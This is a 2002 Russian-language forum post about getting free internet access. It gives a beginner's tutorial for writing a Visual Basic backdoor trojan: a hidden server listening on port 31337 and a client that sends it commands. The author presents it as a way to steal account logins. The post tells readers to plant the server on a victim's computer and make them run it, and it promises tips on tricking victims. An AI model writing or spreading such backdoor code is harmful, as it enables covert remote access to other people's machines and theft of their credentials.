Тема: Халявный инет
Показать сообщение отдельно

  #8  
Старый 18.12.2002, 21:48
Timon Killer
Познающий
Регистрация: 26.09.2002
Сообщений: 40
Провел на форуме:
0

Репутация: 0
По умолчанию
Здравствуйте, дорогие мои! Если вы думаете добычу халявного инета я закончил, то вы глубоко ошибаетесь! У меня ещё припасены многие щтучки-дрючки!
Начну с предисловия. Много раз я прокалывался со сканированием диапазонов на расшареные ресурсы, и поэтому решил пойти дальше. Сегодня я расскажу вам как добыть аккуант с помощю "Трояна". Я знаю вы скажете: "Во блин, ды я сам знаю как воровать пасс/логин с помощью троя!", но сегодня я предлагаю другое. Я вам расскажу, как написать троян на Visual Basic.
Вам потребуется компилятор ВБ, и эта статья. Вам не нужны какие либо познания в ВБ, потомучто я всё разжевал до мелочей. Итак начнём.

..:: Как написать свой троян на Visual Basic (manual для начинающих) ::..

Троянов на виртуальном свете много. Какие - то становятся известными, другие остаются незамеченными. Вообще признанные трояны вещь испытанная и казалось бы что тут выбирать Но антивирусы совершенствуются, и рано или поздно известные трояны обнаруживаются ими. Может быть это и хорошо, ведь это даёт толчок (от слова толкать :-)) нашим троянописцам на написание новых троянчиков. Ну ладно, если грамотно писать код, то никакие AVP мониторы нас не обнаружат. Ну а если готовый троян, что самое худшее, отсылает результаты ёще и на мыло автора Остаётся единственный выход - писать пони самому. В этой статье будем писать BackDoor троян. То есть троян, который открывает как бы черный вход, заднюю дверь. Состоит он из двух частей - сервера и клиента. Сервер - та часть, которая закидывается на машину жертвы и открывает нам эту самую заднюю дверь (порт), и ждёт там нас. Он также скрывается от таск монитора (Ctrl+Alt+Del) и прописывается в автозагрузке. Клиент - часть трояна, которая остаётся у нас и с её помощью мы подключаемся к отрытому порту. Начнём с сервера.


1. Сервер
Создаём новый проект (стандартный exe'шник) и к первой форме (по умолчанию Form1) добавляем Winsock control. Делается это так: меню "Проект"->"Компоненты" ("Project"->"Components&quot, выбираем там Micosoft Winsock control. Если такового нету, то жмём "Обзор" ("Browse&quot и находим файл mswinsck.ocx на жёстком диске. Жмём "ок" и у нас появляется кнопка в панели инструментов с изображением двух компьютеров. После этого помещаем его на форму и задаём имя "ws". В свойствах этого компонента в параметр "LocalPort" вписываем номер порта, например 31337. Теперь изменяем и саму форму: убираем заголовок и в свойствах изменяем параметр "Visible" на False. Теперь переключаемся на написание кода. Выбираем сверху из выпадающего меню Form, а из другого, рядом с ним, Load.И здесь пишем:

Private Sub Form_Load()
Do
If ws.State <> sckConnected And ws.State <> sckListening Then
ws.Close
ws.Listen
End If
DoEvents
Loop
End Sub

Это значит если не установлено никакого соединения сервер закрывает связь и слушает порт 31337 в ожидании нас. Далее нужно выбрать из того же верхнего меню "ws", а из другого "ConnectionRequest" и пишем:

Private Sub ws_ConnectionRequest(ByVal requestID As Long)
ws.Close
ws.Accept requestID
End Sub

Это значит как только клиент начинает подключаться, сервер перестаёт слушать порт и соединяет его. Теперь выбираем код для ws и DataArrival и пишем следущее:

Private Sub ws_DataArrival(ByVal bytesTotal As Long)
Dim Data As String
ws.GetData Data

Select Case Data
Case "BEEP"
Beep
Case "MSG"
MsgBox "Die, Lamo!", vbInformation, "Die, Lamer!"
Case "END"
End
End Select
End Sub

Это команды, которые могут прийти с сервера. Конечно не все. "Beep" - сигнал динамика у жертвы. "MSG" - сообщение (вместо "Die, Lamo!" и "Die, Lamer!" можно вставить своё) "END" - закрытие сервера. Если придёт команда закрытия сервера, вы не сможете больше подлючиться (Если только сервер не прописан в автозагрузке. В этом случае сможете подлючиться после перезагрузки машины жертвы). ВСЁ!!! Поздравляю! Вы написали сервер для вашего трояна! Остаётся создать servak.exe. (Файл->Создать... ; File->Create...)

Ну что ж, сервер мы сделали. Пора приступать созданию самой интересной и короткой части нашего трояна. Вот здесь не будет никакой скрытности. ВОТ ТУТ ДАЙ ВОЛЮ СВОЕМУ РАЗЫГРАВШЕМУСЯ ВООБРАЖЕНИЮ!!!

2.Клиент.


Значит так: создавай проект и можешь как хочешь изуродовать (или наоборот) форму (и проект), но главное чтобы на ней были 5 основных кнопок и два текстовых поля. А ещё надо перетащить на форму компонент Winsock Control (как это сделать описано выше). Имена у кнопок не меняем. А вот то, что на них написано (Caption) нужно поменять (Подключиться, отключиться, закрыть сервак, сообщение, бип). Текстовым полям нужно дать такие имена: IP и Port. В текстовое поле Port можно сразу вписать 31337(Параметр Text), т.к. наш сервер слушает только этот порт, и даже сделать недоступным (Параметр "Locked" - True). В коде сделаем так чтобы отображался наш IP. Вот как это делается: (Меню Form и Load)

Private Sub Form_Load()
IP.Text = ws.LocalIP
End Sub

Теперь пишем код дальше:

Private Sub Command1_Click()
ws.Close
ws.RemoteHost = IP
ws.RemotePort = Port
ws.Connect
End Sub

Private Sub Command2_Click()
ws.Close
End Sub

Всё это значит, что при нажатии кнопки "Подключиться"(Command_1) мы подключаемся к указанному IP - адресу, а при нажатии отключиться(Command_2) просто закроем связь.

Private Sub Command3_Click()
If ws.State <> sckConnected Then Exit Sub
ws.SendData "BEEP"
End Sub

Private Sub Command4_Click()
If ws.State <> sckConnected Then Exit Sub
ws.SendData "MSG"
End Sub

Private Sub Command5_Click()
If ws.State <> sckConnected Then Exit Sub
ws.SendData "END"
End Sub

А эти кнопки(сообшение, бип, закрыть сервак) отправляют команды, если соединение уже установлено. ВСЁ!!! ПОЗДРАВЛЯЮ!!! Создай client.exe. Ты сделал клиента для своего трояна. Да ты вообще троян написал!!! Ну я немножко помог, но это не считается. Можешь считать себя крутым троянописцем:-))) Можешь протестировать свой троян: запусти сначала servak.exe(его не будет видно на экране, только в таскбаре), а потом client.exe и подключись к самому себе. Если ты не к чему не подключён, то твой IP будет 127.0.0.1. Теперь выход в свет. Закинь на комп жертве servak.exe и заставь запустить. Узнай IP адрес своего заклятого друга и вводи, когда он будет в Инете или с тобой по модему.

Всё, трой мы написали. Теперь надо впарить троян, сеёчас я расскажу как это делать.